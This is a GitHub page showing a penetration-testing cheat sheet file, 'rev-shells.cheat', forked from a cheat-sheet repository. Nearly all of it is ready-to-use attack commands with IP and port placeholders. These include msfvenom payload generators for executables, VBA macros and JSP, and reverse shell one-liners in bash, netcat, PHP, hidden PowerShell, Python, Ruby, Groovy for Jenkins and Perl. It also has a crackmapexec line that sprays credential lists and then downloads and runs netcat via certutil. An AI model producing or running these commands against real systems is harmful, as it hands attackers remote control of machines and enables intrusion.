forked from esp0xdeadbeef/cheat.sheets
-
Notifications
You must be signed in to change notification settings - Fork 5
/
rev-shells.cheat
56 lines (36 loc) · 3.22 KB
/
rev-shells.cheat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
% rev shells cheats
$ IP: for adaptername in $(for i in "$(ip a s | sort -r | grep -E $'[[:digit:]]:[ ]')"; do echo $(echo $i | awk '{print $2}' | replace : ''); done); do ip a s $adaptername | grep 'inet\ ' | awk '{print $2}' | cut -d '/' -f 1 ; done | uniq
# x86 normal
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f exe
# x64 (CMD Single Stage)
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f exe
# reverse HTTP
msfvenom -p windows/meterpreter/reverse_http LHOST=<IP> LPORT=<port> -f exe
# reverse HTTPS
msfvenom -p windows/meterpreter/reverse_https LHOST=<IP> LPORT=<port> -f exe
# Powershell Payload
msfvenom -p cmd/windows/reverse_powershell LHOST=<IP> LPORT=<port>
# Macro Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f vba
# JSP rev shell (msfvenom)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<port> -f raw
# Bash RevShell
bash -i >& /dev/tcp/<IP>/<port> 0>&1
# Netcat OpenBsd RevShell [nc-mkfifo]
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <port> >/tmp/f
# Minimal PHP Rev Shell
php -r '$sock=fsockopen("<IP>",<port>);exec("/bin/bash -i <&3 >&3 2>&3");'
# nc plain Rev Shell
nc -e /bin/bash <IP> <port>
# Windows PowerShell RevShell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<IP>",<port>); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (pwd).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};$client.Close()
# Python Rev Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<port>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
# Ruby Rev Shell
ruby -rsocket -e'f=TCPSocket.open("<IP>",<port>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
# crackmapexec (windows specific) download nc64.exe from your (tun0 port 80, webserver, revshell on port 443) box and execute it.
cme smb <target> -u <user-list> -d <target> -p <pass-list> -X "certutil.exe -urlcache -split -f http://<IP>/nc64.exe nc64.exe; .\nc64.exe <IP> 443 -e powershell.exe";
# Jenkins Rev Shell [Groovy Script]
String host=<IP>;int port=<port>;String cmd="sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
# Perl Rev Shell
perl -e 'use Socket;$i="<IP>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("<shell> -i");};'